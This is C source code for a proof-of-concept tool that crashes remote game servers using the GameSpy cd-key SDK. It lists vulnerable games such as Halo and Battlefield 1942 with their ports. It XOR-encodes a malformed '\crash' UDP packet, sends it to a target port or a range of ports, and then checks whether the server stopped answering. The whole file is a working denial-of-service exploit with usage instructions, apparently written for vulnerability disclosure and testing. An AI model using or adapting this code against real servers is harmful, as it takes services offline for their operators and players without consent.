/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define DELAY   sleep(50)
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define DELAY   usleep(50000)
    #define ONESEC  1
#endif



#define VER         "0.1.1"
#define BUFFSZ      2048
#define TIMEOUT     3



void gamespyxor(u_char *str, int len);
void gs_info_udp(u_int ip, u_short port);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock, int sec);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    int     sd,
            scan = 0;
    u_short from,
            to,
            valid;
    u_char  pck[] = "\\crash\0",
                /* the bug is caused by the absence of  */
                /* the final backslash (as \crash\)     */
                /* the final NULL is useless but I want */
                /* to be sure at 100%                   */
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Gamespy hidden cd-key SDK: remote server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Vulnerable games                 Latest bugged versions  Default query ports\n"
            "----------------------------------------------------------------------------\n"
            "  Battlefield 1942               1.6.19, 1.6rc1          23000, 22000 (LAN)\n"
            "  Contract Jack                  1.1                     27888\n"
            "  Gore                           1.48 (1.49)             27778\n"
            "  Halo                           1.031                   2302\n"
            "  Hidden & Dangerous 2           1.04                    11004\n"
            "  IGI 2: Covert Strike           1.3                     26001\n"
            "  Judge Dredd: Dredd vs. Death   1.01                    25858\n"
            "  Need For Speed Hot Pursuit 2   242                     61220\n"
            "  TRON2.0                        1.042                   27888\n"
            "  ...possibly others...\n"
            "\n"
            "Usage: %s <server> <port>\n"
            "\n"
            "use the port FROM-TO for sending the packets to all the ports in the range\n"
            "\n", argv[0]);
        exit(1);
    }

    p = strchr(argv[2], '-');
    if(p) *p++ = 0;
    from = atoi(argv[2]);
    if(p) {
        to = atoi(p);
        scan = 1;
    } else {
        to = from;
    }
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(from);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), from);

    if(!scan) {
        printf("- query server\n");
        gs_info_udp(peer.sin_addr.s_addr, from);
    }

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    gamespyxor(pck, sizeof(pck) - 1);

        /* boom */
    printf("- send malformed packet\n");
    for(valid = from; from <= to; from++) {
        peer.sin_port = htons(from);
        printf("  try port %hu\r", from);

        if(sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
            if(!scan) std_err();
        } else {
            valid = from;
        }

        DELAY;
    }
    if(!scan) {
            // resend again to be sure
        sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));
    }

    close(sd);

    fputc('\n', stdout);
    if(scan) {
        if(valid != to) printf("- port %hu seems valid\n", valid);
        printf("- scanning finished, check the server\n");
        return(0);
    }

        /* check */
    printf("- check if the server is crashed:\n");
    sleep(ONESEC);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    if(sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd, TIMEOUT) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
    }
    close(sd);
    return(0);
}



void gamespyxor(u_char *str, int len) {
    u_char  gamespy[] = "gamespy",
            *gs;

    for(gs = gamespy; len; len--, gs++, str++) {
        if(!*gs) gs = gamespy;
        *str ^= *gs;
    }
}



void gs_info_udp(u_int ip, u_short port) {
    int     sd,
            len,
            nt = 1;
    u_char  buff[4096],
            *p1,
            *p2;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    len = send_recv(sd, "\\status\\", 8, buff, sizeof(buff) - 1, 1);

    buff[len] = 0;
    for(p1 = buff; (p2 = strchr(p1, '\\')); p1 = p2 + 1, nt++) {
        *p2 = 0;

        if(nt & 1) {
            printf("%s\n", p1);
        } else {
            printf("%30s: ", p1);
        }
    }
    printf("%s\n\n", p1);
    close(sd);
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        return(0);

    } else if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            fputs("\nError: socket timeout, no reply received\n\n", stdout);
            exit(1);
        }

    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



